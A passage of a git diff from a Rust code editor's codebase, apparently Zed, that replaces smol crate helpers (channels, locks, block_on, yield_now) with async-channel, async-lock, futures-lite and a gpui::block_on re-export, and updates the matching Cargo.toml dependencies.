a/crates/fs/tests/integration/fs.rs +++ b/crates/fs/tests/integration/fs.rs @@ -439,7 +439,7 @@ async fn test_realfs_atomic_write(executor: BackgroundExecutor) { // drop(file); // We still hold the file handle here let content = std::fs::read_to_string(&file_to_be_replaced).unwrap(); assert_eq!(content, "Hello"); - smol::block_on(fs.atomic_write(file_to_be_replaced.clone(), "World".into())).unwrap(); + gpui::block_on(fs.atomic_write(file_to_be_replaced.clone(), "World".into())).unwrap(); let content = std::fs::read_to_string(&file_to_be_replaced).unwrap(); assert_eq!(content, "World"); } @@ -449,7 +449,7 @@ async fn test_realfs_atomic_write_non_existing_file(executor: BackgroundExecutor let fs = RealFs::new(None, executor); let temp_dir = TempDir::new().unwrap(); let file_to_be_replaced = temp_dir.path().join("file.txt"); - smol::block_on(fs.atomic_write(file_to_be_replaced.clone(), "Hello".into())).unwrap(); + gpui::block_on(fs.atomic_write(file_to_be_replaced.clone(), "Hello".into())).unwrap(); let content = std::fs::read_to_string(&file_to_be_replaced).unwrap(); assert_eq!(content, "Hello"); } @@ -594,7 +594,7 @@ async fn test_realfs_broken_symlink_metadata(executor: BackgroundExecutor) { let path = tempdir.path(); let fs = RealFs::new(None, executor); let symlink_path = path.join("symlink"); - smol::block_on(fs.create_symlink(&symlink_path, PathBuf::from("file_a.txt"))).unwrap(); + gpui::block_on(fs.create_symlink(&symlink_path, PathBuf::from("file_a.txt"))).unwrap(); let metadata = fs .metadata(&symlink_path) .await @@ -614,7 +614,7 @@ async fn test_realfs_symlink_loop_metadata(executor: BackgroundExecutor) { let path = tempdir.path(); let fs = RealFs::new(None, executor); let symlink_path = path.join("symlink"); - smol::block_on(fs.create_symlink(&symlink_path, PathBuf::from("symlink"))).unwrap(); + gpui::block_on(fs.create_symlink(&symlink_path, PathBuf::from("symlink"))).unwrap(); let metadata = fs .metadata(&symlink_path) .await diff --git a/crates/git/Cargo.toml b/crates/git/Cargo.toml index 23a937bf1fa174..a96d8cbe0a9a0b 100644 --- a/crates/git/Cargo.toml +++ b/crates/git/Cargo.toml @@ -32,6 +32,7 @@ rope.workspace = true schemars.workspace = true serde.workspace = true smallvec.workspace = true +async-channel.workspace = true smol.workspace = true sum_tree.workspace = true text.workspace = true diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index c67e8c1e650ad5..c436ffbf6dfb8d 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -3,6 +3,7 @@ use crate::stash::GitStash; use crate::status::{DiffTreeType, GitStatus, StatusCode, TreeDiff}; use crate::{Oid, RunHook, SHORT_SHA_LENGTH}; use anyhow::{Context as _, Result, anyhow, bail}; +use async_channel::Sender; use collections::HashMap; use futures::channel::oneshot; use futures::future::BoxFuture; @@ -15,7 +16,6 @@ use rope::Rope; use schemars::JsonSchema; use serde::Deserialize; use smallvec::SmallVec; -use smol::channel::Sender; use smol::io::{AsyncBufReadExt, AsyncReadExt, BufReader}; use text::LineEnding; @@ -123,7 +123,7 @@ struct CommitDataRequest { } pub struct CommitDataReader { - request_tx: smol::channel::Sender, + request_tx: async_channel::Sender, _task: Task<()>, } @@ -3068,7 +3068,7 @@ impl GitRepository for RealGitRepository { fn commit_data_reader(&self) -> Result { let git_binary = self.git_binary()?; - let (request_tx, request_rx) = smol::channel::bounded::(64); + let (request_tx, request_rx) = async_channel::bounded::(64); let task = self.executor.spawn(async move { if let Err(error) = run_commit_data_reader(git_binary, request_rx).await { @@ -3094,7 +3094,7 @@ impl GitRepository for RealGitRepository { async fn run_commit_data_reader( git: GitBinary, - request_rx: smol::channel::Receiver, + request_rx: async_channel::Receiver, ) -> Result<()> { let mut process = git .build_command(&["cat-file", "--batch"]) diff --git a/crates/git_graph/Cargo.toml b/crates/git_graph/Cargo.toml index 55c054b138b132..7a8f78b46e7023 100644 --- a/crates/git_graph/Cargo.toml +++ b/crates/git_graph/Cargo.toml @@ -21,6 +21,7 @@ test-support = [ [dependencies] anyhow.workspace = true +async-channel.workspace = true collections.workspace = true db.workspace = true editor.workspace = true @@ -34,7 +35,6 @@ project_panel.workspace = true search.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true theme.workspace = true theme_settings.workspace = true time.workspace = true diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 65b0894c2e64c5..e0f4afff467f90 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -1542,7 +1542,7 @@ impl GitGraph { return; } - let (request_tx, request_rx) = smol::channel::unbounded::(); + let (request_tx, request_rx) = async_channel::unbounded::(); repo.update(cx, |repo, cx| { repo.search_commits( diff --git a/crates/git_ui/Cargo.toml b/crates/git_ui/Cargo.toml index 1e2d7f79dd3203..19242ee3f0566b 100644 --- a/crates/git_ui/Cargo.toml +++ b/crates/git_ui/Cargo.toml @@ -29,6 +29,7 @@ editor.workspace = true file_icons.workspace = true fs.workspace = true futures.workspace = true +futures-lite.workspace = true fuzzy.workspace = true fuzzy_nucleo.workspace = true git.workspace = true @@ -55,7 +56,6 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true strum.workspace = true telemetry.workspace = true theme.workspace = true diff --git a/crates/git_ui/src/project_diff.rs b/crates/git_ui/src/project_diff.rs index 4a300a525740cb..67d9a96b2d6746 100644 --- a/crates/git_ui/src/project_diff.rs +++ b/crates/git_ui/src/project_diff.rs @@ -13,6 +13,7 @@ use editor::{ multibuffer_context_lines, scroll::Autoscroll, }; +use futures_lite::future::yield_now; use git::repository::DiffType; use git::{ @@ -33,7 +34,6 @@ use project::{ }, }; use settings::{Settings, SettingsStore}; -use smol::future::yield_now; use std::any::{Any, TypeId}; use std::sync::Arc; use theme::ActiveTheme; diff --git a/crates/gpui/src/gpui.rs b/crates/gpui/src/gpui.rs index dbb57f46efc376..9f307f56b8fadc 100644 --- a/crates/gpui/src/gpui.rs +++ b/crates/gpui/src/gpui.rs @@ -122,6 +122,8 @@ pub use util::{FutureExt, Timeout}; pub use view::*; pub use window::*; +pub use pollster::block_on; + /// The context trait, allows the different contexts in GPUI to be used /// interchangeably for certain operations. pub trait AppContext { diff --git a/crates/gpui/src/test.rs b/crates/gpui/src/test.rs index 2ee45f899c3941..9f224871330d90 100644 --- a/crates/gpui/src/test.rs +++ b/crates/gpui/src/test.rs @@ -207,7 +207,7 @@ pub fn observe(entity: &Entity, cx: &mut TestAppContext) -> Obser let (tx, rx) = async_channel::unbounded(); let _subscription = cx.update(|cx| { cx.observe(entity, move |_, _| { - let _ = pollster::block_on(tx.send(())); + let _ = gpui::block_on(tx.send(())); }) }); let rx = Box::pin(rx); diff --git a/crates/gpui_wgpu/src/wgpu_atlas.rs b/crates/gpui_wgpu/src/wgpu_atlas.rs index f3b9de1ca82e16..94b4b561c00b3b 100644 --- a/crates/gpui_wgpu/src/wgpu_atlas.rs +++ b/crates/gpui_wgpu/src/wgpu_atlas.rs @@ -399,8 +399,8 @@ fn swizzle_upload_data(bytes: &[u8], format: wgpu::TextureFormat) -> Vec { #[cfg(all(test, not(target_family = "wasm")))] mod tests { use super::*; + use gpui::block_on; use gpui::{ImageId, RenderImageParams}; - use pollster::block_on; use std::sync::Arc; fn test_device_and_queue() -> anyhow::Result<(Arc, Arc)> { diff --git a/crates/gpui_wgpu/src/wgpu_context.rs b/crates/gpui_wgpu/src/wgpu_context.rs index 2662a9289d0c1b..80900311b2d11b 100644 --- a/crates/gpui_wgpu/src/wgpu_context.rs +++ b/crates/gpui_wgpu/src/wgpu_context.rs @@ -44,7 +44,7 @@ impl WgpuContext { // Select an adapter by actually testing surface configuration with the real device. // This is the only reliable way to determine compatibility on hybrid GPU systems. let (adapter, device, queue, dual_source_blending, color_texture_format) = - pollster::block_on(Self::select_adapter_and_device( + gpui::block_on(Self::select_adapter_and_device( &instance, device_id_filter, surface, diff --git a/crates/language/Cargo.toml b/crates/language/Cargo.toml index 1392ed63f64b7d..b4d24765de9c90 100644 --- a/crates/language/Cargo.toml +++ b/crates/language/Cargo.toml @@ -35,6 +35,7 @@ ec4rs.workspace = true encoding_rs.workspace = true fs.workspace = true futures.workspace = true +futures-lite.workspace = true fuzzy.workspace = true globset.workspace = true gpui.workspace = true @@ -55,7 +56,6 @@ serde_json.workspace = true settings.workspace = true shellexpand.workspace = true smallvec.workspace = true -smol.workspace = true streaming-iterator.workspace = true strsim.workspace = true sum_tree.workspace = true diff --git a/crates/language/src/buffer.rs b/crates/language/src/buffer.rs index e15568affcc29f..ec3b4327e1b31d 100644 --- a/crates/language/src/buffer.rs +++ b/crates/language/src/buffer.rs @@ -27,6 +27,7 @@ use collections::{HashMap, HashSet}; use encoding_rs::Encoding; use fs::MTime; use futures::channel::oneshot; +use futures_lite::future::yield_now; use gpui::{ App, AppContext as _, Context, Entity, EventEmitter, HighlightStyle, SharedString, StyledText, Task, TextStyle, @@ -36,7 +37,6 @@ use lsp::LanguageServerId; use parking_lot::Mutex; use settings::WorktreeId; use smallvec::SmallVec; -use smol::future::yield_now; use std::{ any::Any, borrow::Cow, diff --git a/crates/language/src/buffer_tests.rs b/crates/language/src/buffer_tests.rs index 9f4562bf547f38..a13678a27d2821 100644 --- a/crates/language/src/buffer_tests.rs +++ b/crates/language/src/buffer_tests.rs @@ -3,6 +3,7 @@ use crate::Buffer; use clock::ReplicaId; use collections::BTreeMap; use futures::FutureExt as _; +use futures_lite::future::yield_now; use gpui::{App, AppContext as _, BorrowAppContext, Entity}; use gpui::{HighlightStyle, TestAppContext}; use indoc::indoc; @@ -559,7 +560,7 @@ async fn test_normalize_whitespace(cx: &mut gpui::TestAppContext) { // Spawn a task to format the buffer's whitespace. // Pause so that the formatting task starts running. let format = buffer.update(cx, |buffer, cx| buffer.remove_trailing_whitespace(cx)); - smol::future::yield_now().await; + yield_now().await; // Edit the buffer while the normalization task is running. let version_before_edit = buffer.update(cx, |buffer, _| buffer.version()); diff --git a/crates/language/src/language.rs b/crates/language/src/language.rs index ea8a0c69a1a85e..ef495d462b97b9 100644 --- a/crates/language/src/language.rs +++ b/crates/language/src/language.rs @@ -37,6 +37,7 @@ use http_client::HttpClient; pub use language_core::highlight_map::{HighlightId, HighlightMap}; +use futures::future::FutureExt as _; pub use language_core::{ BlockCommentConfig, BracketPair, BracketPairConfig, BracketPairContent, BracketsConfig, BracketsPatternConfig, CodeLabel, CodeLabelBuilder, DebugVariablesConfig, DebuggerTextObject, @@ -61,7 +62,6 @@ use regex::Regex; use semver::Version; use serde_json::Value; use settings::WorktreeId; -use smol::future::FutureExt as _; use std::{ ffi::OsStr, fmt::Debug, diff --git a/crates/language/src/language_registry.rs b/crates/language/src/language_registry.rs index 8c115af27d844e..a9d5777be01e5e 100644 --- a/crates/language/src/language_registry.rs +++ b/crates/language/src/language_registry.rs @@ -33,7 +33,7 @@ use sum_tree::Bias; use text::{Point, Rope}; use theme::Theme; use unicase::UniCase; -use util::{ResultExt, maybe, post_inc}; +use util::{maybe, post_inc}; pub struct LanguageRegistry { state: RwLock, @@ -1096,18 +1096,6 @@ impl LanguageRegistry { ) -> mpsc::UnboundedReceiver<(LanguageServerName, BinaryStatus)> { self.lsp_binary_status_tx.subscribe() } - - pub async fn delete_server_container(&self, name: LanguageServerName) { - log::info!("deleting server container"); - let Some(dir) = self.language_server_download_dir(&name) else { - return; - }; - - smol::fs::remove_dir_all(dir) - .await - .context("server container removal") - .log_err(); - } } impl LanguageRegistryState { diff --git a/crates/language_model_core/Cargo.toml b/crates/language_model_core/Cargo.toml index 7a6de00f3e4a77..e9aa06400b6d3c 100644 --- a/crates/language_model_core/Cargo.toml +++ b/crates/language_model_core/Cargo.toml @@ -14,6 +14,7 @@ doctest = false [dependencies] anyhow.workspace = true +async-lock.workspace = true cloud_llm_client.workspace = true futures.workspace = true gpui_shared_string.workspace = true @@ -22,6 +23,5 @@ partial-json-fixer.workspace = true schemars.workspace = true serde.workspace = true serde_json.workspace = true -smol.workspace = true strum.workspace = true thiserror.workspace = true diff --git a/crates/language_model_core/src/rate_limiter.rs b/crates/language_model_core/src/rate_limiter.rs index 790be05ac069b8..28e92056f9de6e 100644 --- a/crates/language_model_core/src/rate_limiter.rs +++ b/crates/language_model_core/src/rate_limiter.rs @@ -1,5 +1,5 @@ +use async_lock::{Semaphore, SemaphoreGuardArc}; use futures::Stream; -use smol::lock::{Semaphore, SemaphoreGuardArc}; use std::{ future::Future, pin::Pin, diff --git a/crates/language_models/Cargo.toml b/crates/language_models/Cargo.toml index f5828fa28d7064..c74526dba23855 100644 --- a/crates/language_models/Cargo.toml +++ b/crates/language_models/Cargo.toml @@ -13,6 +13,7 @@ path = "src/language_models.rs" [dependencies] ai_onboarding.workspace = true +async-lock.workspace = true anthropic = { workspace = true, features = ["schemars"] } anyhow.workspace = true aws-config = { workspace = true, features = ["behavior-version-latest"] } @@ -55,7 +56,6 @@ schemars.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true strum.workspace = true tokio = { workspace = true, features = ["rt", "rt-multi-thread"] } ui.workspace = true diff --git a/crates/language_models/src/provider/bedrock.rs b/crates/language_models/src/provider/bedrock.rs index 1069ad80fc0249..1a8d477192ec55 100644 --- a/crates/language_models/src/provider/bedrock.rs +++ b/crates/language_models/src/provider/bedrock.rs @@ -2,6 +2,7 @@ use std::pin::Pin; use std::sync::Arc; use anyhow::{Context as _, Result, anyhow}; +use async_lock::OnceCell; use aws_config::stalled_stream_protection::StalledStreamProtectionConfig; use aws_config::{BehaviorVersion, Region}; use aws_credential_types::{Credentials, Token}; @@ -40,7 +41,6 @@ use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use serde_json::Value; use settings::{BedrockAvailableModel as AvailableModel, Settings, SettingsStore}; -use smol::lock::OnceCell; use std::sync::LazyLock; use strum::{EnumIter, IntoEnumIterator, IntoStaticStr}; use ui::{ButtonLink, ConfiguredApiCard, Divider, List, ListBulletItem, prelude::*}; diff --git a/crates/language_models_cloud/Cargo.toml b/crates/language_models_cloud/Cargo.toml index de82fdfa627829..e861a8dbf48a1c 100644 --- a/crates/language_models_cloud/Cargo.toml +++ b/crates/language_models_cloud/Cargo.toml @@ -25,7 +25,6 @@ schemars.workspace = true semver.workspace = true serde.workspace = true serde_json.workspace = true -smol.workspace = true thiserror.workspace = true [dev-dependencies] diff --git a/crates/language_models_cloud/src/language_models_cloud.rs b/crates/language_models_cloud/src/language_models_cloud.rs index da5659bf508d4e..9d04e100c09085 100644 --- a/crates/language_models_cloud/src/language_models_cloud.rs +++ b/crates/language_models_cloud/src/language_models_cloud.rs @@ -7,8 +7,9 @@ use cloud_llm_client::{ SERVER_SUPPORTS_STATUS_MESSAGES_HEADER_NAME, ZED_VERSION_HEADER_NAME, }; use futures::{ - AsyncBufReadExt, FutureExt, Stream, StreamExt, + AsyncBufReadExt, AsyncReadExt as _, FutureExt, Stream, StreamExt, future::BoxFuture, + io::BufReader, stream::{self, BoxStream}, }; use google_ai::GoogleModelMode; @@ -30,7 +31,6 @@ use language_model::{ use schemars::JsonSchema; use semver::Version; use serde::{Deserialize, Serialize, de::DeserializeOwned}; -use smol::io::{AsyncReadExt, BufReader}; use std::collections::VecDeque; use std::pin::Pin; use std::str::FromStr; diff --git a/crates/multi_buffer/Cargo.toml b/crates/multi_buffer/Cargo.toml index a06599999c8147..5dccddaba62735 100644 --- a/crates/multi_buffer/Cargo.toml +++ b/crates/multi_buffer/Cargo.toml @@ -26,6 +26,7 @@ anyhow.workspace = true clock.workspace = true collections.workspace = true ctor.workspace = true +futures-lite.workspace = true buffer_diff.workspace = true gpui.workspace = true itertools.workspace = true @@ -34,7 +35,6 @@ log.workspace = true parking_lot.workspace = true rand.workspace = true rope.workspace = true -smol.workspace = true settings.workspace = true serde.workspace = true smallvec.workspace = true diff --git a/crates/multi_buffer/src/multi_buffer.rs b/crates/multi_buffer/src/multi_buffer.rs index 59272d4b7c582f..8b7b1002d96dac 100644 --- a/crates/multi_buffer/src/multi_buffer.rs +++ b/crates/multi_buffer/src/multi_buffer.rs @@ -16,6 +16,7 @@ use buffer_diff::{ }; use clock::ReplicaId; use collections::{BTreeMap, Bound, HashMap, HashSet, IndexSet}; +use futures_lite::future::yield_now; use gpui::{App, Context, Entity, EventEmitter}; use itertools::Itertools; use language::{ @@ -33,7 +34,6 @@ use gpui::AppContext as _; use rope::DimensionPair; use settings::Settings; use smallvec::SmallVec; -use smol::future::yield_now; use std::{ any::type_name, borrow::Cow, diff --git a/crates/notifications/Cargo.toml b/crates/notifications/Cargo.toml index e0640c67cc55b3..b03a658655fb47 100644 --- a/crates/notifications/Cargo.toml +++ b/crates/notifications/Cargo.toml @@ -24,8 +24,8 @@ test-support = [ anyhow.workspace = true channel.workspace = true client.workspace = true +futures-lite.workspace = true component.workspace = true -db.workspace = true gpui.workspace = true rpc.workspace = true sum_tree.workspace = true diff --git a/crates/notifications/src/notification_store.rs b/crates/notifications/src/notification_store.rs index f30a018811db82..2e23b945a6f947 100644 --- a/crates/notifications/src/notification_store.rs +++ b/crates/notifications/src/notification_store.rs @@ -1,7 +1,7 @@ use anyhow::{Context as _, Result}; use channel::ChannelStore; use client::{ChannelId, Client, UserStore}; -use db::smol::stream::StreamExt; +use futures_lite::stream::StreamExt; use gpui::{App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task}; use rpc::{Notification, TypedEnvelope, proto}; use std::{ops::Range, sync::Arc}; diff --git a/crates/outline/Cargo.toml b/crates/outline/Cargo.toml index 2ce031bd4605e6..84d596b761fea8 100644 --- a/crates/outline/Cargo.toml +++ b/crates/outline/Cargo.toml @@ -20,7 +20,6 @@ language.workspace = true ordered-float.workspace = true picker.workspace = true settings.workspace = true -smol.workspace = true theme.workspace = true theme_settings.workspace = true ui.workspace = true @@ -40,3 +39,4 @@ rope.workspace = true serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } +futures.workspace = true diff --git a/crates/outline/src/outline.rs b/crates/outline/src/outline.rs index af5671632fdac1..78c4d9c148eec3 100644 --- a/crates/outline/src/outline.rs +++ b/crates/outline/src/outline.rs @@ -454,13 +454,13 @@ mod tests { use std::time::Duration; use super::*; + use futures::stream::StreamExt as _; use gpui::{TestAppContext, UpdateGlobal, VisualTestContext}; use indoc::indoc; use language::FakeLspAdapter; use project::{FakeFs, Project}; use serde_json::json; use settings::SettingsStore; - use smol::stream::StreamExt as _; use util::{path, rel_path::rel_path}; use workspace::{AppState, MultiWorkspace, Workspace}; diff --git a/crates/outline_panel/Cargo.toml b/crates/outline_panel/Cargo.toml index e88a0262907fcb..a5bbf3f7ccc2d2 100644 --- a/crates/outline_panel/Cargo.toml +++ b/crates/outline_panel/Cargo.toml @@ -14,11 +14,13 @@ doctest = false [dependencies] anyhow.workspace = true +async-channel.workspace = true collections.workspace = true db.workspace = true editor.workspace = true file_icons.workspace = true fuzzy.workspace = true +futures.workspace = true gpui.workspace = true itertools.workspace = true language.workspace = true @@ -31,7 +33,6 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true theme.workspace = true theme_settings.workspace = true ui.workspace = true diff --git a/crates/outline_panel/src/outline_panel.rs b/crates/outline_panel/src/outline_panel.rs index 4a30f2ff8743c1..7b378c6fb8283f 100644 --- a/crates/outline_panel/src/outline_panel.rs +++ b/crates/outline_panel/src/outline_panel.rs @@ -46,7 +46,6 @@ use project::{File, Fs, GitEntry, GitTraversal, Project, ProjectItem}; use search::{BufferSearchBar, ProjectSearchView}; use serde::{Deserialize, Serialize}; use settings::{Settings, SettingsStore}; -use smol::channel; use theme::SyntaxTheme; use theme_settings::ThemeSettings; use ui::{ @@ -156,7 +155,7 @@ struct SearchState { kind: SearchKind, query: String, matches: Vec<(Range, Arc>)>, - highlight_search_match_tx: channel::Sender, + highlight_search_match_tx: async_channel::Sender, _search_match_highlighter: Task<()>, _search_match_notify: Task<()>, } @@ -177,8 +176,8 @@ impl SearchState { window: &mut Window, cx: &mut Context, ) -> Self { - let (highlight_search_match_tx, highlight_search_match_rx) = channel::unbounded(); - let (notify_tx, notify_rx) = channel::unbounded::<()>(); + let (highlight_search_match_tx, highlight_search_match_rx) = async_channel::unbounded(); + let (notify_tx, notify_rx) = async_channel::unbounded::<()>(); Self { kind, query, @@ -5249,6 +5248,7 @@ impl GenerationState { #[cfg(test)] mod tests { use db::indoc; + use futures::stream::StreamExt as _; use gpui::{TestAppContext, UpdateGlobal, VisualTestContext, WindowHandle}; use language::{self, FakeLspAdapter, markdown_lang, rust_lang}; use pretty_assertions::assert_eq; @@ -5258,7 +5258,6 @@ mod tests { project_search::{self, perform_project_search}, }; use serde_json::json; - use smol::stream::StreamExt as _; use util::path; use workspace::{MultiWorkspace, OpenOptions, OpenVisible, ToolbarItemView}; diff --git a/crates/project/Cargo.toml b/crates/project/Cargo.toml index 628e979aab939a..3a27bf4de61249 100644 --- a/crates/project/Cargo.toml +++ b/crates/project/Cargo.toml @@ -38,6 +38,7 @@ aho-corasick.workspace = true anyhow.workspace = true askpass.workspace = true async-trait.workspace = true +async-channel.workspace = true base64.workspace = true buffer_diff.workspace = true circular-buffer.workspace = true diff --git a/crates/project/src/buffer_store.rs b/crates/project/src/buffer_store.rs index b5828d60689d6a..2e234a7f936e7b 100644 --- a/crates/project/src/buffer_store.rs +++ b/crates/project/src/buffer_store.rs @@ -46,7 +46,7 @@ pub struct BufferStore { #[derive(Default)] struct RemoteProjectSearchState { // List of ongoing project search chunks from our remote host. Used by the side issuing a search RPC request. - chunks: HashMap>, + chunks: HashMap>, // Monotonously-increasing handle to hand out to remote host in order to identify the project search result chunk. next_id: u64, // Used by the side running the actual search for match candidates to potentially cancel the search prematurely. @@ -1716,8 +1716,8 @@ impl BufferStore { pub(crate) fn register_project_search_result_handle( &mut self, - ) -> (u64, smol::channel::Receiver) { - let (tx, rx) = smol::channel::unbounded(); + ) -> (u64, async_channel::Receiver) { + let (tx, rx) = async_channel::unbounded(); let handle = util::post_inc(&mut self.project_search.next_id); let _old_entry = self.project_search.chunks.insert(handle, tx); debug_assert!(_old_entry.is_none()); diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 22dd3123ed2192..71eaca61cfd32c 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -310,7 +310,7 @@ pub struct JobInfo { struct CommitDataHandler { _task: Task<()>, - commit_data_request: smol::channel::Sender, + commit_data_request: async_channel::Sender, completion_senders: HashMap>>, pending_requests: HashSet, } @@ -4812,7 +4812,7 @@ impl Repository { &mut self, log_source: LogSource, search_args: SearchCommitArgs, - request_tx: smol::channel::Sender, + request_tx: async_channel::Sender, cx: &mut Context, ) { let repository_state = self.repository_state.clone(); @@ -4912,7 +4912,7 @@ impl Repository { cx: &mut AsyncApp, ) -> Result<(), SharedString> { let (request_tx, request_rx) = - smol::channel::unbounded::>>(); + async_channel::unbounded::>>(); let task = cx.background_executor().spawn({ let log_source = log_source.clone(); @@ -5029,8 +5029,8 @@ impl Repository { fn open_commit_data_handler(&self, cx: &Context) -> CommitDataHandler { let state = self.repository_state.clone(); - let (result_tx, result_rx) = smol::channel::bounded::<(Oid, CommitData)>(64); - let (request_tx, request_rx) = smol::channel::unbounded::(); + let (result_tx, result_rx) = async_channel::bounded::<(Oid, CommitData)>(64); + let (request_tx, request_rx) = async_channel::unbounded::(); let foreground_task = cx.spawn(async move |this, cx| { while let Ok((sha, commit_data)) = result_rx.recv().await { diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index a61eab730e26cf..483f1252c4d10b 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -1180,7 +1180,7 @@ impl LocalLspStore { async move { let actions = params.actions.unwrap_or_default(); let message = params.message.clone(); - let (tx, rx) = smol::channel::bounded::(1); + let (tx, rx) = async_channel::bounded::(1); let level = match params.typ { lsp::MessageType::ERROR => PromptLevel::Critical, lsp::MessageType::WARNING => PromptLevel::Warning, @@ -1226,7 +1226,7 @@ impl LocalLspStore { let name = name.to_string(); let mut cx = cx.clone(); - let (tx, _) = smol::channel::bounded(1); + let (tx, _) = async_channel::bounded(1); let level = match params.typ { lsp::MessageType::ERROR => PromptLevel::Critical, lsp::MessageType::WARNING => PromptLevel::Warning, @@ -13978,7 +13978,7 @@ pub struct LanguageServerPromptRequest { pub message: String, pub actions: Vec, pub lsp_name: String, - pub(crate) response_channel: smol::channel::Sender, + pub(crate) response_channel: async_channel::Sender, } impl LanguageServerPromptRequest { @@ -13987,7 +13987,7 @@ impl LanguageServerPromptRequest { message: String, actions: Vec, lsp_name: String, - response_channel: smol::channel::Sender, + response_channel: async_channel::Sender, ) -> Self { let id = NEXT_PROMPT_REQUEST_ID.fetch_add(1, atomic::Ordering::AcqRel); LanguageServerPromptRequest { @@ -14014,7 +14014,7 @@ impl LanguageServerPromptRequest { actions: Vec, lsp_name: String, ) -> Self { - let (tx, _rx) = smol::channel::unbounded(); + let (tx, _rx) = async_channel::unbounded(); LanguageServerPromptRequest::new(level, message, actions, lsp_name, tx) } } diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index ea400e28e86f9c..c0b39c33dd7263 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -5224,7 +5224,7 @@ impl Project { envelope: TypedEnvelope, mut cx: AsyncApp, ) -> Result { - let (tx, rx) = smol::channel::bounded(1); + let (tx, rx) = async_channel::bounded(1); let actions: Vec<_> = envelope .payload .actions diff --git a/crates/project/src/project_search.rs b/crates/project/src/project_search.rs index a1914670162163..2db893538c837e 100644 --- a/crates/project/src/project_search.rs +++ b/crates/project/src/project_search.rs @@ -10,6 +10,7 @@ use std::{ }; use anyhow::Context; +use async_channel::{Receiver, Sender, bounded, unbounded}; use collections::HashSet; use fs::Fs; use futures::FutureExt as _; @@ -19,7 +20,6 @@ use language::{Buffer, BufferSnapshot}; use parking_lot::Mutex; use postage::oneshot; use rpc::{AnyProtoClient, proto}; -use smol::channel::{Receiver, Sender, bounded, unbounded}; use util::{ResultExt, maybe, paths::compare_rel_paths, rel_path::RelPath}; use worktree::{Entry, ProjectEntryId, Snapshot, Worktree, WorktreeSettings}; diff --git a/crates/project/src/terminals.rs b/crates/project/src/terminals.rs index e22af5d552fa8e..aa0f94ef7078f3 100644 --- a/crates/project/src/terminals.rs +++ b/crates/project/src/terminals.rs @@ -2,12 +2,12 @@ use anyhow::Result; use collections::HashMap; use gpui::{App, AppContext as _, Context, Entity, Task, WeakEntity}; +use async_channel::bounded; use futures::{FutureExt, future::Shared}; use itertools::Itertools as _; use language::LanguageName; use remote::RemoteClient; use settings::{Settings, SettingsLocation}; -use smol::channel::bounded; use std::{ path::{Path, PathBuf}, sync::Arc, diff --git a/crates/recent_projects/Cargo.toml b/crates/recent_projects/Cargo.toml index fbb7bb31a939c2..6062aaa8a9036c 100644 --- a/crates/recent_projects/Cargo.toml +++ b/crates/recent_projects/Cargo.toml @@ -44,7 +44,6 @@ semver.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true task.workspace = true telemetry.workspace = true ui.workspace = true diff --git a/crates/recent_projects/src/remote_servers.rs b/crates/recent_projects/src/remote_servers.rs index 77553791f87f75..f475baddd99376 100644 --- a/crates/recent_projects/src/remote_servers.rs +++ b/crates/recent_projects/src/remote_servers.rs @@ -12,7 +12,7 @@ use dev_container::{ use editor::Editor; use extension_host::ExtensionStore; -use futures::{FutureExt, channel::oneshot, future::Shared}; +use futures::{FutureExt, StreamExt as _, channel::oneshot, future::Shared}; use gpui::{ Action, AnyElement, App, ClickEvent, ClipboardItem, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task, @@ -31,7 +31,6 @@ use settings::{ RemoteProject, RemoteSettingsContent, Settings as _, SettingsStore, update_settings_file, watch_config_file, }; -use smol::stream::StreamExt as _; use std::{ borrow::Cow, collections::BTreeSet, diff --git a/crates/remote_server/Cargo.toml b/crates/remote_server/Cargo.toml index c6ce45ba1ce283..48c047252fe1e4 100644 --- a/crates/remote_server/Cargo.toml +++ b/crates/remote_server/Cargo.toml @@ -23,6 +23,7 @@ test-support = ["fs/test-support"] [dependencies] anyhow.workspace = true +async-channel.workspace = true askpass.workspace = true clap.workspace = true client.workspace = true diff --git a/crates/remote_server/src/server.rs b/crates/remote_server/src/server.rs index bc39e4635e9611..c0a6d6de1993b4 100644 --- a/crates/remote_server/src/server.rs +++ b/crates/remote_server/src/server.rs @@ -41,6 +41,7 @@ use rpc::proto::{self, Envelope, REMOTE_SERVER_PROJECT_ID}; use rpc::{AnyProtoClient, TypedEnvelope}; use settings::{Settings, SettingsStore, watch_config_file}; use smol::{ + Timer, channel::{Receiver, Sender}, io::AsyncReadExt, stream::StreamExt as _, @@ -181,7 +182,7 @@ fn init_logging_server(log_file_path: &Path) -> Result>> { .open(log_file_path) .context("Failed to open log file in append mode")?; - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let target = Box::new(MultiWrite { file: log_file, @@ -472,6 +473,9 @@ pub fn execute_run( |task| { app.background_executor().spawn(task).detach(); }, + // we are running outside gpui + #[allow(clippy::disallowed_methods)] + |duration| FutureExt::map(Timer::after(duration), |_| ()), ); let log_rx = init_logging_server(&log_file)?; log::info!( @@ -727,6 +731,9 @@ pub(crate) fn execute_proxy( |task| { smol::spawn(task).detach(); }, + // we are running outside gpui + #[allow(clippy::disallowed_methods)] + |duration| FutureExt::map(Timer::after(duration), |_| ()), ); log::info!("starting proxy process. PID: {}", std::process::id()); @@ -755,7 +762,7 @@ pub(crate) fn execute_proxy( ); 